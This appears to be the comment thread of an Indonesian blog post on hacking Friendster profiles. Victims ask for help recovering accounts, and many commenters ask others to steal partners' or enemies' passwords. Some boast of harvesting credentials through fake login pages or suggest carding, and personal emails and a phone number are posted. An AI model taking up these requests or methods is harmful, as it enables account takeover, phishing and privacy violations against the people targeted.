kakak2 semuannya, saya boleh minta tolong gak.. friendster saya kena hack trus email, password, sm profilenya diganti sama si hackers..profile saya diganti paraaaah banget..saya sampe stress..boleh tau ga cara menon aktifkan account temen saya, katanya kalo kirim email ke adminnya friendster bisa di cancel accountnya..email admin friendster saya ga tau, jadi bingung harus gimana,,kalo kakak2 ada yang bisa bantu tolong kirm ke email saya di bng_mandor@yahoo.com..makasi ya..

31 08 2007
Idoenk

@ wanna_be
bla..bla..bla..
org ga tau apa2 emang terlalu sumbang kalo terpaksa ngomong!
amy?siapa..
poor u, just be a wanna be. all can do just loud & clear screamin’ like a b*tch.
siapa yg larang org utk bernarsisme di FS? NONE.
siapa yg memaksa bermain di site yg rapuh spt di FS? NONE.
so, u’re takin’ UR OWN RISK by playin’ around there, don’t u?!
org mo mati ko msh bisa mikir FS???!!!<– (-_-)” ck..ck..

gak ada asap gak ada api bung, mereka yg melakukan pasti punya alasan.
~Trust is Still a Weakness~

@TS
aCh tuh apa? andy Ch ?

.::Astalavista::.

5 09 2007
oppi

ah ini mah udah ngak hebat. friendster kan udah ngeupdate dia punya secure. jadi ngak bisa sembarang flash yang dimainkan di profile lo smua. gw udah pernah nih. emang sih berhasil. TADINYA. udah dapet sekitar 26-an account. yaa hasilnya lo musti sabar klo fs lo kena suspended. and, sekarang itu script udah ngak jalan lagi. mau lo taro di testi. profile. ato media box.

29 08 2009
yohanes

hallo boleh dong kenalan

5 09 2007
fi_deewi

wah ni artikel lmyan bgzz,,,tp thank’s bwt srnx cz q dulu prnh ketagihan bwt bka fs,,,tp kasian deh ka’ klo smpe gnti profile mreka cz mrka ga pux slh ma qta…awas kena karma lho??

12 09 2007
shecamilyn

Hi can you please hack this account in friendster? It’s my account before but somebody else uses it and I don’t know what their email address and password they are using. please send it to my email. i can only provide you the URL:
http://profiles.friendster.com/47561008

hope you could help me thanks

13 09 2007
satan angel

hhaduhhh .
qukh fz aq dijailin ciihhh .jgn att .
kmbaliin zprti zmula dunk ….
jail bgd ziii .

13 09 2007
satan angel

hhadeuuhhh .gmn att cr bnerin fz aqqq .
cz jhd gag muncul profilnya .
nigh fz aq .
laknadh@ngel.inhell
bnerin dunk ….

14 09 2007
Takhrib

Jgn sok menggurui, kl kemampuan kau baru sebatas jiplak..

14 09 2007
Takhrib

Maksud kau mencantumkan link penulis, semata itu hanya menjadi kambing hitam jika apa yg kau tulis tidak berpungsi.. Teramat pintar kau lempar batu sembunyi tangan..

Mana hasil karya kau sendiri..?

15 09 2007
uhe

payah

18 09 2007
sayaLupanamasaya

kk kk yang baik2 dan pintar2..account fs saya di hack..ada yang bisa membantu u/ dapetin account saya lagi nga??klo ada tolong kirim email ke snich_2k7@yahoo.com ya…terima kasih banyak ya kak..thx..thx…thx..

20 09 2007
anak_cupu

bagi yaang baca comment saya,,,,,,, sassssssaaaayaaaaa ssssaaaannnggaaat minta tolong ajarin saya ngeHAck FS,, cOz fs saya pernah d HACK orang lain
jadi yg bs ngeHACk fs ajarin saya

21 09 2007
bolehditerawang

gak jalan

26 09 2007
harfa

tolong betulin fs
kena worm
http//profiles.friendster.com/27817553
ini fs pacar wa pleaseeeeeeeeeeeee

27 09 2007
satanangel

tlong bneurin fz saiia dunk .
kna piruus ungs ….
fs saiia .
lakn@dh.angel

28 09 2007
Ray

simply change itu caranya gmana c??

10 10 2007
Tuxieforte

@ satanangel (13:33:08) :
knp ada orang yg ngelakuin ini?
wotever, delete some post from ur coment, here u can access:
http://www.friendster.com/comments.php?uid=38925932
Dunno, which one is, u think ’bout it.
Jangan asal add comment atuh !!

@ harfa (00:23:44) :
Kali ini knp lagi? Ce cakep2 FSnya di surface redirect ke hack-page, apakah krn sikapnya kurang cakep?! people name it deh.. >,<
Hapus isi di About Me & (jika Perlu) Who I Want to Meet..
Trus isi lagi. (Jangancopy paste!!), coz ada malicious code disitu..
Might this help, Thanks..

.::Astalavista::.

10 10 2007
kankuro

soal pesannya kakak….. buat blog di internet itu gak ada yang gratis…. coba kasitahu linknya dunk

15 10 2007
kurokurowo

ak mau tanya ni taunya fsnya di hack darimana yach????

15 10 2007
kurokurowo

ak mau tanya ni taunya fsnya di hack darimana yach???? ga ada perubahan apa2 itu rasanya???

16 10 2007
uya"

Bila canda membuat salah
biLa tangis sudaH tak berHarga
bilA senyum tLah hLang
hanya satu yaNg kupinta
maaFin aq y…………

gak_lulus_tk@yahoo.co.id add xaaaaaaaaaa…………

21 10 2007
arya
22 10 2007
zoel

ternyata nge-hack FS segampang membalikkan telapak tangan, wkwkwkwk..🙂

22 10 2007
zoel

eh, tapi pesenQ: jangan nge-hack kalo ga pengin di hack!!! oyi?? hwahahaha…🙂

23 10 2007
Whatever....!

ahhhh, bosen ngehack FS tuk Mbah Thor n Ommm Chaidir ajarin dong cara ngecrack Dongle!lagi butuh banget neh……..

26 10 2007
linux newbie

bagus mas, minta ijin untuk saya sadur di buku saya ya mas.

27 10 2007
Boaz

tolong dong dierjelas caranya ngrusak FS. Plase…

1 11 2007
zue

man…

bsa tolongin ane g?>???

fs ane entah kenapa jd g bsa login…padahal ane dah masukin username n password dgn benar sebenar-benarx….
menurut info yg dah ane dpet,kateny password ane udah d bobol ma org usil,n doi dah berhasil mengganti password ane….

tolong cariin solusix ya…
please….
yahoo accountx..kharizz_1987bluedark@yahoo.co.id
usernamex……….the_consfir@cy.me

resultx ane tungguin at elyani_kharis_m@yahoo.co.id

thanks b4…

3 11 2007
zoel

halo boss…
sekarng FS udah ga “nerima” comment pake object flash..
jadi teknik ini udah ga laku, hehehe…😀

5 11 2007
yohanes

haiii
saya minta tolong hack fs pacar saya
emailnya : rinoa_yuna211@yahoo.co.id
tolong kirim password ke email saya: natalukita_yohanes@hotmail.com

5 11 2007
yohanes

tolong kasih password fs pacar saya
emailnya fs : rinoa_yuna211@yahoo.co.id
thanx
kirim pass ke natalukita_yohanes@hotmail.com

5 11 2007
yohanes

tolong kasih password fs pacar saya
rinoa_yuna211@yahoo.co.id
tolong kirim password ke
natalukita_yohanes@hotmail.com
thanxxx
pentinggg

7 11 2007
sampah

wah jadi kesimpulannya friendster itu sama dengan bakso ya?
jadi kepingin makan friendster. laper nih….

7 11 2007
tonie

Bro,
gw minta bantuan juga dunk. fs gw kemarin di jahilin sama langithujan@yahoo.com kadang langithitam@yahoo.com

tolong kirim keemail gw dunk thanks ya..

13 11 2007
Hyde

Help…bs bantu tdk, fs gw d hack orang (pirates) jd gk bs msuk…email n passwordnya dah dganti ky’a…apa bisa dikembalikan seperti semula…please!!!!
qrim k email gw y caranya!!!!
makasih….

13 11 2007
sikaii89

ya elahhhhh….
Hack FS mainan anak TK…

tuh bank swiss lo acak2..
wokwokowkokwokw

hacker indo copoo

14 11 2007
hi_tech

mas,ajarin gua ngeheck fs yg sedetail-detailnya donk,tp yg mudah2 j y,n ajarin jg cr ngehilangin hack org lain,pliiiiz

14 11 2007
hi_tech

oh y mas krimin crnya lwt emailq y : david_ozora2006@yahoo.com

19 11 2007
p@y

Seeps dah mantaab….Fs ane juga di hack temen nih…gimana ya…. cara benerinnya, masa di ajarin cara rusak doank…😀

20 11 2007
iwan

mas, tolong ajarin ngehack fs se detail2 nya donk,

kalo perlu sekalian script nya yah,,

thx udah nanggepin

email iwan_getho@yahoo.com

20 11 2007
richie

mas bisa terangin ke saya pakai bahasa yang lebih sederhana , gak ? tolong kirim ke email saya , terima kasih

22 11 2007
HotarU iMAi

wele,,,,innnsyyaaaff bagi yg menggunakan ini buat nge-hack!!!XDXDXD

22 11 2007
rais

om maaf neh, emg gak boleh klo di masukan k dlam testi…
soalnya pas baru saya masukin tadi ga ada kejadian pa2

23 11 2007
anukukeseleo

ga seru ngehack friendster gw pnya cara ngehack cewe orang….

pasti sukses

26 11 2007
Abu

Kamu memang boleh hack Friendster? Jika ya, tolong hubungi saya di email yang telah diberikan.

Thanks, ya!🙂

26 11 2007
Gres

keren2 sarannya..
friendster tu cm ngembangin tekno doank..
tp security nya ga dijaga,..

27 11 2007
R3nz

pliz send cara hacking friendster ke alamat e_mail gwe….

28 11 2007
fade

cara balikin fs yang di-hack gmn?
plis bantuannya…

28 11 2007
kaito_kid_1412

alowwww semua lam kenal yah,,,,,

w msih lum ngerti ni tentang ngehack frindster.

tlong jlasin dunk tapi yang gampang di terka ma orang awam kaya w.

tapi kalo da cara yang paling mudah w juga mau….hehehehehehe

kirim mail ke bboypinokio@yahoo.co.id keys plis.

29 11 2007
green_hat

hmmfff…..
fffiiuuhhh…….cuma bisa bilang itu aja mas…
trick nya lumayan…he..he..he…
untung nggak ke pencet..:)

29 11 2007
green_hat

open source…
eh malah ketemu
regedit4
( HKEY_CURRENT_USER/BLA..BLA…BLA/BLA…BLA….
“plural”=bla..bla..bla… value 0000000 (_)(_)###D <– titit
ha..ha…ha…ha….
apaan neh maksud nya mas ya…tuing…tuing…

29 11 2007
Anti_FS

…JGN Jd tolol cm ngliatin FS aja.
Mending duitnya bwt beli sate aja..
Ngapain jd kuper tau..

30 11 2007
Agin Bayu

muft ganggu …
anda tau gag cara ngebenerind fs yang di hack …
gag bisa ngirim comment and gag bisa ngapus comment si hacker …
plissss……. udah pusing nyari kemana-mana ……

6 12 2007
siputdarat

ah bosen maennya cma di fs gx ad perkembnagan,,,basi

7 12 2007
projekgw@plasa.com

hhmmm…bos
script yang diatas itu buat nge-hack web fs doangkan ??/
klu buat nge-defece profile orang gimana bos ???
tolong ksh tau script ma cara nya dong yang jelas sekalian cara ngebenerin profil fs kita yang di defece ma orang
plese>>.

7 12 2007
Hacking Friendster « Goodboys’s Weblog

[…] Hacking Friendster Friece12beFri, 07 Dec 2007 08:49:05 +0000 4, 2007 Filed under: 1 — goodboys @ 2:49 Hack Friendster […]

8 12 2007
ShOWRONK_orlan_DO

waduh….

makasih yuaaaaaaaah kk hacker ,da mo bagi2 info nya

kapan2 dinner lah supaya bisa berbagi rasa yg lebih dalem lagi,xixixiixix

salam kenal yuah

9 12 2007
HACKING FRIENDSTER (Swf)Macromedia « Anaghackers’s Weblog

[…] Hack Friendster […]

13 12 2007
me

gak ngertiii!

14 12 2007
dio

sipp….
setuju….
mending blajar yang laen, masih banyak info N ilmu yg di dapet dari ngnet…

oya, ada scrip laen yang lbh simple ga…???
msh bljar ney…..
kl blh minta tutorialnya lg,
ajarin dunk ttg scrip…..

hehehehe…………….
thanks……………….

14 12 2007
dio

sipp….
setuju….
mending blajar yang laen, masih banyak info N ilmu yg di dapet dari ngnet…

oya, ada scrip laen yang lbh simple ga…???
msh bljar ney…..
kl blh minta tutorialnya lg,
ajarin dunk ttg scrip…..

hehehehe…………….
thanks……………….

bls yup mas……
bangsat.gila@yahoo.com
thx b4…..

14 12 2007
jimgun

saya sudah mencoba artikel nya mas, tapi setelah di approve, yang tampil hanya tulisan 0 di testimonial korban. Tidak ada yang bisa di klik tuh…..

apa yang salah ya ? Mohon pencerahannya

thx

19 12 2007
ME

Btw kasih tau dunkz gimana cranya nampilin kode javascript dalam postingan blog anda!!!coz aq udah kesusahan g tau gimana caranya!!!!!!!!!!!!!!
kirim e-mail ke new_chapters_fz@yahoo.com

19 12 2007
x

hey can you translate that in english I can’t understad guys!!!!!!!!!!!!!!!!!!!!!!!!!1

19 12 2007
x

you can email me here at harvey_fake@yahoo.com

22 12 2007
jefri

bos …. gw ga ngarti…caranya gmn…
bingung…
tolong jelasin donk..cara ngehack fs orang gmn…
kirim ke email gw ya
jefri.adv@gmail.com

22 12 2007
me

om… ne gw pnya fs tapi ada yang nge hack gtu terus gak bisa dibuka nah taw solusi gak um…. bales yahh cepetan….

30 12 2007
sixo man

kk q yg baek ni friendster gw kn hack ni gmn y
kagak bisa nge login gitu

gmn caranya/solusinya?
bales nya cepetan y

2 01 2008
D.I.E

gw paling benci klw da orang yang selalau ngobrolin fs makanya mw gw rusak semua acount fs orang

5 01 2008
numPunK_Lay-What!

misi ach…

rame bener.. ada apa ya?

6 01 2008
farul

salam..

FS gw kena hack..
n ga bsa LOG IN,,
sama ky artikel yg d atas..

gmn cr na tuk fix nya ya..??
help me..

need your help..

6 01 2008
zudie

wahhhhhhhhhhh fs gw diobrak abrik org…

6 01 2008
sasuk3

bro gmn nich situs freindster nggak bisa di buka di kompoter gw
apaan sich maslahnya tolok kasih masukkan yaa broo

7 01 2008
nonee

waaah tuh script sudah ga mempannn!!!!!!
yg lain dooonk

10 01 2008
Gombez

Boz commentnya ko cuman punya om THoR aj yang dibalezzzz??!!!

Orang lain mana??

Takut ma om ThOr ya…..hehe

10 01 2008
bagazt

gimana sih caraNya bikin layouts yang keren wat friendster….??????????
pengen punya layout friedster tapi bentukNya kaya layouts myspeace…..
kasih tau ya……kalo ada yang mo bantu…..kirim email ke Bagazt73@yahoo.co.id
tolong ya…di tunggu……makasih………..

12 01 2008
Aryo

Kalo mang jago, loe hack FS gua!
Address cari ndiri tapi.
He54534… Gw tantang loe!

15 01 2008
deso

friendster itu apa sih?

16 01 2008
green_hat

om thor…
ini apaaa…..:((:((

function get_a(){};function get_adi(){};var rsinetsegs = new Array(“happy”,”sad”);
function goLink(){};
function inject_code(str){document.write(str);};<— ampuuuooonnn…
function popPLTracklink(_link,param_0,param_1,param_2){sendInitCall(param_0, param_1, param_2);popPlaytime(_link);};function tracklink(_link,param_0,param_1,param_2){location.href = _link;};
function recordASCEvent2(){};

18 01 2008
ryan

cara hack friendster gmn??

ngambil kode nya dmn??

22 01 2008
DINA

mas.mas tolongin sy dunn.. fs sy kena jail gede2an. email+passnya dganti ama org. trs fs sy jg raib dr fs tmn2 sy. pas sy cr pk uRL / USERESARCH eh malaH NOT AVAILABLE. lho kok aneh??? gmn donk?? bisa tolonginn ya plisssssssssss… bantu dunk bantu. bisnya tu fs pnuh ama tmn2 lamaaaaa.. dan commentnya dah byk. plisssss bgt jwb k email sy aja ya. pliss =))

24 01 2008
cHoQ

tak ngerti……………..

agak di perjelas dnk kakak……………..!

24 01 2008
Flareon

Iyah betul sekali jika seumpama Om author ini bilang bahwa para korban hacking FS ni rata2 ABG yg cuma suka liat cew atau cow yg cakep/ganteng di internet tanpa ingin mengetahui/mempelajari lebih dalam tentang Internet.
Walaupun sudah lama trik fake login berkembang namun sampai sekarang saya masih saja dapet log log yg jika saya copas log-log itu ke paper words bisa mencapai 478 lembar lebih..!!!

Dan sering banget saya temukan (70%-80%) pass mereka sama dengan pass email mereka, nah loh….!!!

Makanya hati2 yah kalo pengen berfriendster ria

Warm regards
Flareon

27 01 2008
Chris

Parmisi, bisa minta tolong gak, fs na temen g di hack, trus g pingin bales, tapi gk bisa, tolong hackin dong….. plisssss…………..

orang yang ngehack itu ada di profile gw, fs gw itu http://www.friendster.com/chriestt
nama orang nya global warming…. tolong bgt ya, trus kalo bisa dapet password nya kirimin ke gw dong,………………. di fs aja.

pliss bgt ya…………….

makasih.

27 01 2008
kemuel

please whats your language in this site??

28 01 2008
dyan

mas. fs gw gak bisa dibuka pake kompie kantor.. tulisane diblock up oleh admin

ktnya ada spywarenya… iya toh
so gmn dunk biar bs dibuka

28 01 2008
IgoSoft

hei semua
kalo mau tambahin
gambar2 animasi
kunjungi aja
http://www.geocities.com/beautifyFriendster
gratis boo, bahasa indonesia lagiiie

2 02 2008
rama

hai kk2 yang pada pinter2 gw minta tolong donk tolong kasih tau pasw fs pacar saya
fs nya juliet8stories@yahoo.com

tolong kirim ke email saya yach slankers_tertawa@yahoo.com ya
plzzz tolong penting !!!!!
terimakasih mohon bantuanya !!

4 02 2008
difky

bener banget klo kwarnet cuma main fs! rugi banget…..

5 02 2008
celine

hai kk2 yang pada pinter2 gw minta tolong donk tolong kasih tau pasw fs pacar saya
fs nya hendri_51au@yahoo.com

tolong kirim ke email saya yach
k_celine12@yahoo.com
plzzz tolong penting !!!!!
terimakasih mohon bantuanya !! 😉

5 02 2008
rizkivmaster

Akhirnya ada juga mainan baru, bosan nganggur seminggu ! Udah lama juga postingnya, tapi lumayan, thanks. :p

5 02 2008
angga

friendster rasanya apan ya strawberry y

5 02 2008
Anwar

hahah.. gwa stuju bgt ma paragraph bagi “ABG pencinta friendster” buang2 waktu menurut gw mah, ayoo maju para cracker
huehuehue

5 02 2008
pencinta cracker

hahah, ngapain grabak-grubuk buat ngrurusin friendster seh, kalo udah di heck ma heck ajeh, kaga dibawa MATI ini

6 02 2008
nakalan

hihihi

jgn mainan hack2an gitu bro,

dosa atw engga itu ya?😀

10 02 2008
uyab114ck

yah…. Buat Belajar Khan Kagak Masalah….
think grey hat

13 02 2008
sani kurniawan

Ada maniac yang bikin friendster pake data2 gw….
(http://profiles.friendster.com/31048898)

Gw gak pernah ngerasa bikin account friendster!
gilanya tuh data2 bener, alamat, foto, dsb….
Mungkin kerjaan temen o/ orang sekitar gw, entah apa tujuannnya
tapi gw nener2 gak senang…

Please kasi tau dong gimana cara melenyapkan tuh account karena ngeganggu privasi gw…

Thanks ya Brur…

13 02 2008
toreex

hmmm..

15 02 2008
fauzi

mas tolong hackin punya musuh aq ……. vian_c@yk.beb….

gitu aja deh_______thks

16 02 2008
genjo

masih berlaku gk????

16 02 2008
genjo
16 02 2008
genjo

mas,,tolong ngehack fs ini http://profiles.friendster.com/genjoee

dia nyolong hp gw dan bawa kabur entah kmn

16 02 2008
sangprabo

Salam kenal
Setuju dengan yang dibilang Pak Urip. Kebanyakan a-be-ge jaman sekarang kalo ngenet cuma liat2 FS, pesbuk, dll yang menyita waktu. Lagian, biasanya foto2 orang cakep itu cuma foto doang. Udah diedit pake aplikasi image editor, ditambah cahaya sana-sini, jadi deh orang ganteng/cantik.😀

No offense, cuma pendapat saya pribadi.🙂 Tetap semangat belajar, dan semoga tulisannya mendatangkan manfaat bagi orang banyak.

17 02 2008
OGUD

aq juga mau minta tolong.
ada temenq yang slalu ngirim testi ga jelas sama aq
walaupun aqkagapernah approve testinya
tapi ia malah trus ngirim kaga pernah brenti
jadi intinya aq minta tolong hack fs ini ya
wildan_pintar @g-mail.com
sorry aq kaga bisa buatin link-nya

18 02 2008
BlakApr

^_^ heheh,,, maaf yah,, tapi apakah kemampuan hacker Indonesia untuk menghack FS saja?

sayang sekali kalau begitu,, dari pada hack gak dapat duit,, mending sekalian carding atau scam page ,, dapet duit dan yang dipeloroti bukan bangsa sendiri.

Lagian memang hack masih ngetren yah,,,

ingat masa lalu

19 02 2008
t4kwin

script nya udah basi tuh!!!
tolong update tuh script nye!!!

20 02 2008
and

HEY
if you are really kind
can you get this yahoo or friendster PASSWORD
suzie3107@yahoo.com
its emergency
SEND TO and_7black89@hotmail.com
if cant
its ok
i will find another hacker to help me

Respect

20 02 2008
and

PLEASE!!!!!
='(

22 02 2008
qwee

mas… saya mau nanya…… FS saya ga bisa ngirim testi ke temen-temen apakah itu kena hack or kagak.. trus ngatasinnya gmana…????

plis mas kasi tau saya…..
send ke email saya aja yak… !!

qwee_tazz@yahoo.com

23 02 2008
desita

laah trus gmn cara’na buat blog? duuuh kayk na sRu bet tuu,bis gw sukaaaa bEt mnulis,would you teach me please…….! or ada referensi buku na gak? kasih tw donk mas,please quick answer yak

26 02 2008
anak_singkong

waaaaaaaaah…

Kenapa yah…?

Waaaaaaaaah…

26 02 2008
myzterio

bos chaidir yg baik aq minta diajarin carane ganti passwordte orang lain di friendster doooong . plisss and balesen di emailku yo

10 03 2008
UJANG_KEMOD

udah ga bisa om…………………………………………………………………………………!

pake script bikinan gw…………………………………………………………………………!

lebih ampuh………………………………………………………………………………………..!

11 03 2008
haitoooo

bos…..bisa ajarin buat blog spot?
dan wat is blogspot?

16 03 2008
fauzi

om plz hackin fs pnya musuh gw soal’na dia orangnya b’lagu bgt.ni URL nya http://profiles.friendster.com/54286617

19 03 2008
little einstein

hey gemana c..
friendster itu cuma mbantu kita untuk memperluas hubungan interaksi kita kepada orang2 dan mempermudah kita pula untuk menjaga hubungan jarak jauh..
gemana c..
sekolah ga c?

21 03 2008
L

bener tuh mas, masa mau-maux buang” duit cuman bwt buka fs…
bikin ortu kere aja wkwkwkwkwk, bener ora?
masx bisa php tah? ajarin aku yach

21 03 2008
L

for little enstein..
jgn salahkan kami, karena kami ini cuman sekumpulan pikiran yg bergerumul setiap saat hanya demi mencari ilmu dgn fasilitas yg ada dan gratis, jadi wda jelas bgt toh…gak ada gunanya sman sekali buka fs berjam” di warnet ampe billing neglonjak N mata kita cuman jadi pegel doank tohhh
MIKIR DONK!!!! MANKX MASA DEPAN LOE TERJAMIN APA KALOW PUNYA FS?? HAH?

22 03 2008
obodt

apa ada yang lebih simpel lagi gak????

susah banget sih caranya
tapi gW mw banget ngehack fs org yg gw benci nih…………………………………….

23 03 2008
budi

ngapain buka friendster, nggak ada untungnya.

mendingan buka situs ini:

http://profile.yuwie.com/bhudy100704

mirip friendster sih, cuman ada kelebihannya; yaitu ada komisinya tiap kita beraktivitas di situs itu.

24 03 2008
tzu²

tlg bantu hack fs dunk…penting bgt..ini masalah privasi hehe……
klo ada yang punya link buat hack fs yg lengkap…
email ke tzu_3110@yahoo.co.id yah….
thx for all

31 03 2008
agus

MAS SAYA SEBENERE SELALU TUTUP MATA MASALAH INI COZ SAYA G PERNAH NGEHACK N G MAU DIHACK…

SAYA CUMAN MO KUL..

NI REFRESINGNYA CUMAN FS BISA NGIBUR GW….

EH FSQ MAS DIHACK ORANG SEKARANG EMAILNYA UDAH DIGANTI PWNYA JUGA DIGANTI TRUS EMAILKU JUGA UDAH DIGANTI PWNYA JADI MAU YM G BISA!!
MAS TULUNGIN MAS NI GMN NGEDAPETIN FSKU MAS ???

PAKE WIFI KOK MAS JADI GRATIS G NGERUGIKAN SAPA2 JUGA MAS…

DIGANTI GMBAR G SENONOH TERUS KATA2NYA JUGA…

TAPI UDAH TAK GANTI PW SBLMNYA TAPI TETEP BISA GANTI

GARA2 AKU KASIH PW EMAIL SAMA..

MAS TULUNG MAS…

ADA NO HP G?

ALANGKAH MULIANYA JIKA SEORANG HACKER MAU BANTUIN ORANG YANG JADI KORBAN….

KALO AKU JADI AKU MAU NOLONGIN TEMEN2 YG PADA KE HACK…

KASIAN MAS KULIAH UDAH PUSING NE PULANG SORE ELEKTRO…

LAGI…

MAS SORY YA NGREPOTIN….

YA NO HPNYA MAS… boleh?085649292113 sms aja

31 03 2008
you-the

mas tolong donk mas ajarin gw cara ngehack fs,fs gw ma temen² sering banget di hack ama orang dan gw tau orangnya,,,tlg donk mas ajarin gw,,pleseeee tolong kasih kodenya mas sekalian cara buka fs yang dihack ya mass please,,,,,
kalo bisa kirimin lewat e-mail gw ja ya mas
makasih banget buat bantuannya,,,,
1 lagi mas gimana sih caranya nguasai hal² yang seperti itu ????///

31 03 2008
you-the

da nomor hp g mas ?????????

3 04 2008
haris

bang tolong donk,,buatkan code ngeheck fs…
fs saya suka di ngeheck sama org..lain…
sial bgt t org yg suka ngeheck…fs gw…
gw sih t org y ska bikin ngeheck fs gw….
bang…tolong y bang buatkan code yg bikin fs dia jadi ancur lebur ,,,y bang….
plzzzzzz
kirim k mail saya bang hariis_blxx25@yahoo.co.id

4 04 2008
agung

hi hi hi hi

4 04 2008
van

bbbbbuuuuuuulllllleeeeeeeeeekkkkkkkkk

7 04 2008
dihexa

woi cara iNstal miNg ny gMn

kSh tW doNg

gW gK NgetY

y
pLiss

7 04 2008
dihexa

klo bsa ksih tw nya ke sms mY bLOg
vicnsexy.blogspot
ato ke

v_qie_g@yahoo.com

9 04 2008
inez

tolongin gw donk…
please… please…

beberapa hari lalu gw sempat setting fs gw.. tapi kayak nya gw salah pencet pas waktu masukkin password…

jadi ga bisa dibuka deh….

tolongin yah,,…

gimana cara dapetin password nya lagi…
eureka@148.net

tolong kirim aja ke email gw

Inezz_mukhlisa@yahoo.com

plizzz

tolong yah…

thanks…

13 04 2008
Nantes67

anjreeeetttttt…….

gw dagh capek-capek nginstall Macromedia Fals… gw bikin file swf yang untuk nge-REDIRECT ke situs laen… trus gw pasang di FS..

eh.. tau-taunya dagh di Patch…. lagian juga kalo pake IE yang baru juga dagh gak bisa…..

tapi sekarang gw lagi nyoba pake halaman palsu friendster..,, trus gw bisa langsung dapetin ID and Pass-nya degh…

14 04 2008
egha

eh bang..
donlod ming nya dmna??

14 04 2008
egha

ekh.,balas ke email saya yah bang.,dah ada di required

15 04 2008
mila

saia mau nanya cara ngebuka fs yg udah di ganti email dan passwordnya..soalnya mantan gw ngehack fs gw…jadi kan tadinya dia tau email n pass fs gw (fs gw http://profiles.friendster.com/18015966) tapi skrg dia ngeganti passwordnya ama email fsnya… plisss bantuin saya spy bisa buka fs saia lagi n ganti passwordnya..supaya saia bisa contact2an lagi ama temen2 saia…

tolong kasi tau caranya, saia pemakai windows…kirim ke email saia ya..tolong jgn ribet2 soalny saia rada2 gaptek..

thx

16 04 2008
minori

haih..om yang bkin blog ini..sok tuw abgt yha..pake2 nasihatin segala..ahahah..kayak gag pernah muda aja..=P
haih..om thx…lagi dipraktekin sama gwe..hahaha…
nice to know aja yha…ga pake kasi fs..takut dhack ama si om…wkwkwkwkkw

ditunggu cara nge hack yg lebih canggih lagi ya om ma mii..

CU….

16 04 2008
minori

iihh..picik..gw baca koment dio atas gwe..sirik amat sih……
orang cr temen wajar kan…..gw atw orang yg ga suka fs..tu mukana sangad jeleg wlwpun di edit juga ga rubah2 tu muka..wkwkwkkwkwkw

16 04 2008
sakerhetz

bagus kok mau belajar itu bagus cuma untuk bisa mengcrack sesuatu banyak yang harus dipelajari..phising tidak semudah yang dibayangkan,..tapi semangat buat para newbie

16 04 2008
minori

ommm…gagal nge hacknya..stress nih…gag update nih..aaaaaahhhh….update dunk om…gag bsa2..haihhh……

18 04 2008
banu harsa zulkarnaen

aaaaaaaallllooooooooooww

gua org baru

cara nge hack gmn ?

gua udah bkin 5 fs

smuanya d hack

dasar bajingan

gua pngn ngebales nya

tapi gua ga ngerti sama sekali

kasih tau cara nge hack dong

pliss banget nih

kirim ke fs gua yah caranya nand@kbb.click

tapi jgn d hack

ampun mas

kirimin caranya yah

18 04 2008
banu harsa zulkarnaen

tapi gua pake windows

kirimin yah pliss

gua bete dhack mulu

pliss bgt

22 04 2008
Aurelia

gue mau tahu kehebatan kalian – kalian yang katanya pada jago hecker….

apa bener fs gue bisa di hecker, gue udah pake fs 5 taunan tapi aman aman aja, jangan 2 elo semua cuman omde aja alias omong gede aja…. gue ga percaya kalian biasa bobol fs …… !!!

ok yang mau kenal gue silahkan liat aja fs gue ID nya : Yola_Winokan@yahoo.com

23 04 2008
aNdi_

PunteN………..
permiSi bang saYa baRu di haCk fsNya nigH…..
gag taU ma sYapa kaLo tau jG tu oRang dH di bejeK”
jaDi sate kikiL!!!
saYa ga niAd baLes dendam daN jaHt ama diA cuMa syaya peGen tau caRa haCk gMana dung??
biAr daPet peNgalaman dan beR-haTi”
tRimaKazih seBelumnYa…
___________________________________________________________________________________________________

24 04 2008
jay

english version pls! can’t understand

25 04 2008
sentauruels

-.-” gemana seh, ga pgn di hack.. tapi pgn ng-hack. ah dong dong mbgts lu.

Wew~
ternyata kalo orang FS nya di otak-atik tuh bakal marah kyk getohh ya.
wew baru tau gw. brarti slama ni gw . . . . >.<;

ya ya ya, gw stuju dg comment diatas yg blg, FS tu ga bgitu penting. lgian tu rawan mbgts, pa lg kalo masang foto lu. wedeuew.. hati” ja, pencemaran nama baik bisa dilakukan dg PHOTOMANIPS (hha hha!!)

kalo cuma mo mempererat silaturahmi, kan ada e-mail mas.😀

Lgian, para kaulamuda Indonesia lbh seneng pake FS sih, ditambah lagi itu yg pling gampang bwt di hack. (yeah!!)

so? jgn slhkn orang lain kalo FS mu di hack. :p

ha ha ha~

26 04 2008
ryo

idenya lmyan. tapi akan lebih hebat klo ada cara yang lebih ampuh lagi n lebih gampang..

27 04 2008
bleka

woi…….
tolong kasih tau carana ngehack pass FS dunk….
penting ne…
bkn untuk merusak ko….
cm pengen tau aj…🙂

29 04 2008
Hilman

Wah om…..

friendster da gunannya jg kq bwt ABG2 kya kami…

nda melulu buat liat cowo-cewe friendstergenic doank…

salah satunya adalah fasilitas kostumasi profil..

dari situ saya mulai kenal HTML, JavaScript, CSS dsb..

n mulai belajar serius mpe sekarang…(^___^)

1 05 2008
uniQ

kak , kasi tau donk gimana cara nya tau password friendster orang .
aku cuma tau alamat email ny aja .
reply ke e-mail gw ya …
thanx alot .
really love this site .helpfull

3 05 2008
dianne

HINDI Q KAU MAINTINDIHAN!!!!!!!!!!!!!! TAGALOG PLEASE!!

7 05 2008
mbah_gendeng

wihh masih ad yg bikin hack FS y? tapi gpp deh biar yg pny FS bisa hati2

7 05 2008
Ima

huhuhu…
FS aku kena hacked juga
gimana sih caranya supaya bisa balik lagi?
susah tuh ngumpulin koleksi temen dari TK sampe kerja…
masa mesti bikin account baru lagi sih

8 05 2008
D^D

nanya dong??? cara give up fs gmn y??? ato kalo g bisa jadi suspended user aja de,,,,

8 05 2008
adiet

mas…
numpang tanya!?
fs q tu knp yach??
klu liat profil lewat URL bisa,, tp klu ngliatnya lewat login pasti berubah jadi codingnya html gitu…
mas klu bisa jawabnya lewat emailq ja…
atau mas post disini…
thx before….

8 05 2008
fs perusak bangsa

mas tolong ajarin saya buat ngehack fs dong..
bisnya saya setuju banget ma kutipan diatas. fs udah membabi buta.. bahkan anak-anak sekarang memilih untuk buka fs dari pada cari ilmu pengetahuan di fs..
tolong kirim ke email saya ya, cara nge hack fs..
tx………

14 05 2008
kdir

seseorang telah tukar pasword n emel friendster sy.skrg ni dia letak picture tak senonoh dalam album sy..masalhnya sekarang saya tidak lagi bisa masul ke akaun sy keran telah ditukar pasword n emel..sesiapa yang boleh tolong sy tolong emel sy bagaimana nak delete terus friendster..tolong yer

14 05 2008
kdir

